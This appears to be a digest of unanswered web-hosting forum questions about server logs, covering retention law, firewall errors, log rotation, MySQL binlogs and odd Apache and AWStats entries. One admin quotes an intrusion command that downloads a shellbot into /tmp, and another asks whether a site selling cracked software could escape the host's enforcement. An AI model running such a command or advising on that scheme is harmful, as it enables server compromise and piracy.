I am just about to launch a new service but needed to know if logs are legally necessary - i.e. is there a law saying if I offer access to a server I am legally required to hold logs of all activity?
The service itself is all above board so there is no question from the business side.
All I will record is a log in name and associated IP to ensure that one account is not being accessed by hundreds of different people!
Thought I would try to get this clear in my head before going ahead and launching!
Last week my brother puchased a CD which promised contains thousands of unique templates through [url]
He sell it locally for Indonesia market and leave no contact info.
He showed me and I'm surprised that what did guy did is copied from all sources included templatesmonster.com majority which is available alot of through the net (example: [url]burn it into CD and sell it illegaly.
I reported the site to hostgator.com and got the followin reply: ---------------------------------------------
Hello,
Since there are no templates on the site, you will need to provide evidence of this some how.
Regards, Richard F. Network Security Administrator ISP Blacklist Administrator/Level 3 Systems Administrator PGP Key: [url] ---------------------------------------------
I'm not trying to bash HG, but I need your opinion: is the HG respond is already correct?
So learn from the same thing, if I set a website sell cracked properties and only delivery the product through CD or email (not downloadble one) I can host it with HG as long as no offensive files in their server? Or in this case HG just ignore it because could not understand Indonesia languange?
I just got an email from my vps saying that a BFD attack was stopped and the ip was banned after 40 failed attempts of logging into ftpdpro. I logged in and started looking around and I noticed that in my apf log file there was:
Code: Jan 15 00:54:07 s1 apf(22290): {glob} firewall initalized Jan 15 00:54:07 s1 apf(22290): {glob} fast load snapshot saved Jan 15 00:58:06 s1 apf(32425): {glob} uptime less than 5 minutes, going full load Jan 15 00:58:06 s1 apf(32425): {glob} activating firewall Jan 15 00:58:06 s1 apf(32500): {glob} unable to load iptables module (ip_tables), aborting. Jan 15 00:58:06 s1 apf(32425): {glob} firewall initalized Jan 15 00:58:06 s1 apf(32425): {glob} fast load snapshot saved Jan 15 01:00:04 s1 apf(3950): {glob} uptime less than 5 minutes, going full load My concern is that it says "unable to load iptables module (ip_tables), aborting.
is there anything that logs server load and what processes have caused any spikes?
one of my servers keeps going down under high load, well it seems to lock up and the noc has to reboot, but ofcourse the techs can't diagnose a problem after as it runs fine and when i send them a ticket it's because the server can't be reached at all and then they can't diagnose it either
I moved a domain of mine from one of my CentOS servers on my SoHo LAN, to one of my CentOS cPanel/WHM servers. Since the SoHo machine had been handling this domain's mail for almost 2 years (300+ mb of mail), I decided to continue running it from home.
The Apache daemon was stopped on said SoHo box following DNS propagation to the cPanel machine, but Apache was automatically started again after having to reboot the SoHo server. Before I got a chance to kill Apache, I got some weird entries showin' up in the access_logs.
I ask simply because I don't recall seeing a "CONNECT" entry in my logs before, and I've been at this for awhile. That or I've just not paid any attention. And what's with the SSL port?
I guess I'm just a little confused as to what was trying to be accomplished here...it hasn't returned since.
All the log is under a single file, occupying huge amount of space on our server use lxadmin for the vps
we are unable to even open up the file, as we have almost run out of space, we would atleast like to delete around old logs older than a month, this logs are from 3 months, so please help us in solving this problem
if we delete the sql log, will a new log be created automatically or it gives an error?
if redhat keeps a log of ip addresses which have logged into the server.
Ive got a machine that one of my staff logged into today with the root account, and im wondering if I can find out the ip address of the user who logged in as root?
I have recently started a forum and am wondering where I should locate the error logs for such things as database backups and failed admin panel login attempts.
There is the public_html folder, but I'm concerned that Anything contained within this folder is accessible to prying eyes. Is this true?
I have also heard of directory traversal, which I imagine could fall under the same category.
Would I perhaps be best off creating a folder outside of public_html for the holding of these valuable 'targets'?
What would I best to do to secure my server in this regard? It would have to be writeable for the system to be operational.
Feb 22 04:58:31 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24 Feb 22 04:58:32 la1092 kernel: ata2: status=0x50 { DriveReady SeekComplete } Feb 22 04:58:32 la1092 kernel: Info fld=0x2d7e, Current sdb: sense key No Sense Feb 22 04:58:32 la1092 kernel: ata1: command 0xc8 timeout, stat 0x50 host_stat 0x24 Feb 22 04:58:32 la1092 kernel: ata1: status=0x50 { DriveReady SeekComplete } Feb 22 04:58:32 la1092 kernel: Info fld=0x4632f99, Current sda: sense key No Sense Feb 22 04:58:32 la1092 kernel: ata2: command 0xc8 timeout, stat 0x50 host_stat 0x24
Current setup is nginx, lighttpd and apache as web servers.
I keep receiving hacking attempts from someone accessing my server and running commands like these:
Code: hubberfix
sh -c cd /tmp;lwp-download [url] shellbot
I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.
Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
- exim_mainlog starts at 03/18/2007 (not aware of any rotating log crons)
- grep info@someexternaldomain.com /var/log/exim_mainlog is empty, even after sending to that email from localdomain.com today, a few times
- localdomain.com is found fine in localdomains, trueuserdomains
- localdomain.com sent just fine to another local domain on server plus gmail account. Delivery receipt to both domains plus the info@someexternaldomain.com were "succesful"
I've received from info@someexternaldomain.com many times back and forth without issues, yet today nothing shows up in exim_mainlog NOR any other logs inside /var/log
I have Apache making seperate log files for each of my virtual hosts and putting them in /home/vhostname/log. Rotatelogs makes a new log every 24 hours, but the logs quickly add up and since the sites are fairly busy the logs are at times over a gb. Is there any way to make rotatelogs delete the log files after two days? Or should I just use newsyslog?
I just have a quick question for the experts here regarding the bin logs that MySQL generates. I have Googled around, tried to understand these logs, and from what I gather, it is a good idea to leave on if you want to do replication in case something happens, or if you have a slave or backup drive and you want to replicate to it.
So, these things seem like a good thing to have. My question is though, do they HAVE to stay there now? I unknowingly enabled these back in May on my CentOS server when I used and then tweaked the my-huge conf file, and there they are ever since. Currently they're sucking down 30GB of my hard disk and it's only 80GB.
It would be good if I could just take say, all the ones that haven't been modified for at least a month or so (there are 30 of them, most of them are stopped at 1GB I believe, that's how it splits them up.) Is moving those to another hard disk say, my 500GB one, an OK thing to do?
It won't affect my currently running MySQL data, right? And the bin logs will still be useful?
since i take server i got a lot of errors on my apche logs when i post this command on my shell:-
Code: tail -f /usr/local/apache/logs/error_log will coming a lot & fast error and not stop until i stop the apache:-
Code: [Fri May 29 11:37:52 2009] [error] [client 77.167.228.165] File does not exist: /usr/local/apache/htdocs/40E80014354C4C30365047322020202020202020202020206C0000004D6600000001760000005CEB000530E1E8EEF4 [Fri May 29 11:37:52 2009] [error] [client 89.215.36.123] File does not exist: /usr/local/apache/htdocs/40E80014202020202020465032443031324B3842364842456C000000446600000001760000005CEB000530797F848A [Fri May 29 11:37:52 2009] [error] [client 93.185.179.132] File does not exist: /usr/local/apache/htdocs/40E800006C000001596600000001760000005CEB0005307587A8B4
every thing is ok but i need to remove this error and i can't under stand from where comming ! "/usr/local/apache/htdocs"
I'm sure this question has been asked before, but I'm looking for a nice and simply way of breaking up log files into smaller chunks.
I've been running apache2 on a VPS for the past few months and one of the access.log files is now 700mb big... bit of a waste of space. I'm currently just doing:
I just found hundreds of rubbish urls in awstats for a particular domain. Is this referrer spam or something more serious and can I do something about this?
I am an administrator/developer for a website and we are using Awstats to get the usage statistics. Lately we are getting hits from a bunch of IP Addresses which differ only in the Host ID part.
For example:
Here are the logs
Address-------Page Views----------Last visit 64.12.116.209----25------------17 Jun 2008 12:22 64.12.110.94------2------------17 Jun 2008 12:20 64.12.116.142----11------------17 Jun 2008 12:20 64.12.116.135----42------------17 Jun 2008 12:19 64.12.116.130----18------------17 Jun 2008 12:17 64.12.116.80-----11------------17 Jun 2008 12:17 64.12.116.139----15------------17 Jun 2008 12:15 64.12.116.132----16------------17 Jun 2008 12:14 64.12.116.210----33------------17 Jun 2008 12:10 64.12.116.208----21------------17 Jun 2008 12:06 64.12.116.144-----3------------17 Jun 2008 12:04 64.12.117.5------22------------17 Jun 2008 12:20 64.12.117.11-----50------------17 Jun 2008 12:16 64.12.117.8------56------------17 Jun 2008 12:08 64.12.117.207----17------------17 Jun 2008 12:07 .. ...
Notice how most of the IP addresses are 64.12.116.xxx or 64.12.117.yyy. Similarly I found addresses matching 65.55.109.zzz and a bunch more.
This is making me wonder if this is some kind of an attack (Especially since Awstats seems to say that the hosts list does not include the IP addresses of spiders/crawlers/bots)? We are concerned. Please advise.
The above Hosts List (sorted by Last Visit) was generated by using Awstats our website logs.
my host is telling me that since I don't have a domain name setup (I use [url] that my account won't be logging ANYTHING. no raw access logs or anything. Why is this? Isn't there a setting in the vhost file to setup logs without a domain name?
Lately we have been getting log entries similar to the following from different IPs all over the US:
74.249.4.234 - - [03/Jun/2008:18:12:36 -0500] "GET / HTTP/1.1" 200 6205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
74.249.4.234 - - [03/Jun/2008:18:12:37 -0500] "GET /scripts/javascript.js HTTP/1.1" 200 9153 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
74.249.4.234 - - [03/Jun/2008:18:12:37 -0500] "GET /scripts/overlib.js HTTP/1.1" 200 50733 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)"
That is all there is to each hit.
Obviously, the default index.php file is being loaded and is calling the javascript files, but what we can't understand is why the CSS files and images are not being downloaded as well.
Any ideas on why this would be occurring?
Caching and text based browsing are unlikely scenarios due to the quantity and varied locations of the IPs.
